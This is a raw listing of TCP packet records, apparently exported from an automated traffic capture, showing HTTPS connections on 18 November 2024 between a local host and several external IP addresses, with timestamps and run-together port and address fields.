                                                                                                                                          Nov 18, 2024 06:47:54.003329039 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.181159019 CET44355182152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.181242943 CET44355182152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.181298971 CET55182443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.181320906 CET44355182152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.181339025 CET44355182152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.181406021 CET55182443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.182449102 CET55182443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.182461023 CET44355182152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.189502001 CET55185443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.189594984 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.189687967 CET55185443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.189913034 CET55185443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.189946890 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.190908909 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.237118959 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.305965900 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.305977106 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.306005001 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.306029081 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.306168079 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.306217909 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.306288004 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.307877064 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.307899952 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.307980061 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.307996988 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.308069944 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.421293974 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.421351910 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.421509981 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.421510935 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.421545982 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.421701908 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.422501087 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.422545910 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.422588110 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.422602892 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.422635078 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.422662973 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.424115896 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.424159050 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.424196959 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.424209118 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.424242020 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.424259901 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.509385109 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.509428978 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.509502888 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.509540081 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.509561062 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.509593010 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.536844015 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.536883116 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.536951065 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.537045002 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.537045956 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.537286043 CET55183443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.537308931 CET44355183152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.540793896 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.540885925 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:54.541006088 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.541253090 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:54.541286945 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.236242056 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.236624956 CET55185443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.236686945 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.237050056 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.237471104 CET55185443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.237545967 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.237648964 CET55185443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.279359102 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.471729994 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.471787930 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.471837997 CET55185443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.471852064 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.471868038 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.471925974 CET55185443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.472879887 CET55185443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.472893000 CET44355185152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.572208881 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.572565079 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.572618008 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.573101997 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.573494911 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.573582888 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.573646069 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.615371943 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.620100975 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.802304983 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.843089104 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.913629055 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.913645029 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.913686991 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.913697004 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.913734913 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.913749933 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.913813114 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.913855076 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.913855076 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.913889885 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.920706034 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.920727015 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.920815945 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:55.920835972 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:55.920895100 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.030877113 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.030899048 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.031016111 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.031060934 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.031125069 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.037587881 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.037606955 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.037697077 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.037713051 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.037770033 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.039355993 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.039375067 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.039453983 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.039468050 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.039520025 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.147581100 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.147607088 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.147689104 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.147727966 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.147759914 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.147782087 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.148391962 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.148447037 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.148468971 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.148482084 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.148507118 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:56.148509979 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.148534060 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.148551941 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.148715973 CET55186443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:56.148747921 CET44355186152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:05.124985933 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:05.125041962 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:05.125147104 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:05.125524998 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:05.125544071 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:05.965607882 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:05.965735912 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:05.968066931 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:05.968092918 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:05.968396902 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:05.970149040 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:06.015331030 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:06.247529030 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:06.247556925 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:06.247576952 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:06.247741938 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:06.247741938 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:06.247757912 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:06.247813940 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:06.249910116 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:06.249954939 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:06.249978065 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:06.249984980 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:06.250013113 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:06.250027895 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:06.250097036 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:06.250324011 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:06.250339031 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:06.250354052 CET55190443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:48:06.250360012 CET4435519020.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:08.883848906 CET55193443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:08.883857965 CET44355193152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:08.883939981 CET55193443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:08.884160995 CET55193443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:08.884171963 CET44355193152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:09.915245056 CET44355193152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:09.915587902 CET55193443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:09.915600061 CET44355193152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:09.915911913 CET44355193152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:09.916269064 CET55193443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:09.916357040 CET55193443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:09.916363001 CET44355193152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:09.916373968 CET44355193152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:09.962198973 CET55193443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:10.148024082 CET44355193152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:10.148072958 CET44355193152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:10.148134947 CET44355193152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:10.148200989 CET55193443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:10.148200989 CET55193443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:10.156861067 CET55193443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:10.156893969 CET44355193152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:10.174570084 CET55194443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:10.174665928 CET44355194152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:10.174776077 CET55194443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:10.174961090 CET55194443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:10.174998999 CET44355194152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:11.194847107 CET44355194152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:11.195225000 CET55194443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:11.195269108 CET44355194152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:11.195631981 CET44355194152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:11.196033955 CET55194443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:11.196099043 CET44355194152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:11.196240902 CET55194443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:11.239341974 CET44355194152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:11.425028086 CET44355194152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:11.425091982 CET44355194152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:11.425151110 CET44355194152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:11.425164938 CET55194443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:11.425214052 CET55194443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:11.426220894 CET55194443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:48:11.426258087 CET44355194152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:12.459489107 CET55197443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:12.459506989 CET4435519735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:12.459573030 CET55197443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:12.459800005 CET55197443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:12.459814072 CET4435519735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:12.460280895 CET55198443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:12.460330963 CET4435519835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:12.460412979 CET55198443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:12.460576057 CET55198443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:12.460591078 CET4435519835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.312822104 CET4435519735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.313134909 CET55197443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.313148975 CET4435519735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.314613104 CET4435519735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.314711094 CET55197443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.315690994 CET55197443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.315768003 CET4435519735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.315875053 CET55197443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.315881968 CET4435519735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.317095041 CET4435519835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.317373991 CET55198443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.317398071 CET4435519835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.318870068 CET4435519835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.318933964 CET55198443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.319823027 CET55198443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.319910049 CET4435519835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.364128113 CET55197443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.364140034 CET55198443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.364155054 CET4435519835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.412203074 CET55198443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.537292957 CET4435519735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.537385941 CET4435519735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.537446976 CET55197443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.539201975 CET55197443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.539216042 CET4435519735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.589006901 CET55199443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.589023113 CET4435519935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.589128971 CET55199443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.589344978 CET55199443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:13.589358091 CET4435519935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.645338058 CET4435519935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.645620108 CET55199443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.645629883 CET4435519935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.649214029 CET4435519935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.649292946 CET55199443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.650178909 CET55199443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.650260925 CET4435519935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.650362015 CET55199443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.650369883 CET4435519935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.704124928 CET55199443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.883234024 CET4435519935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.883260012 CET4435519935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.883348942 CET4435519935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.883373976 CET55199443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.883399010 CET55199443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.923676014 CET55199443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.923691034 CET4435519935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.932899952 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.932972908 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.933067083 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.934514046 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.934546947 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.934835911 CET55202443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.934865952 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.934931040 CET55202443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.935101032 CET55203443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.935129881 CET4435520335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.935198069 CET55203443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.935694933 CET55202443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.935710907 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:14.935904980 CET55203443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:14.935937881 CET4435520335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:15.789282084 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:15.789643049 CET55202443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:15.789661884 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:15.790111065 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:15.790468931 CET55202443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:15.790565014 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:15.790635109 CET55202443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:15.792085886 CET4435520335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:15.792404890 CET55203443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:15.792469978 CET4435520335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:15.793569088 CET4435520335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:15.793663979 CET55203443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:15.794002056 CET55203443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:15.794095039 CET4435520335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:15.794169903 CET55203443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:15.794188023 CET4435520335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:15.835335016 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:15.838165998 CET55203443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:16.095132113 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:16.095164061 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:16.095181942 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:16.095283031 CET55202443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:16.095304012 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:16.095366955 CET55202443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:16.096339941 CET4435520235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:16.096365929 CET4435520235.71.186.151192.168.2.16
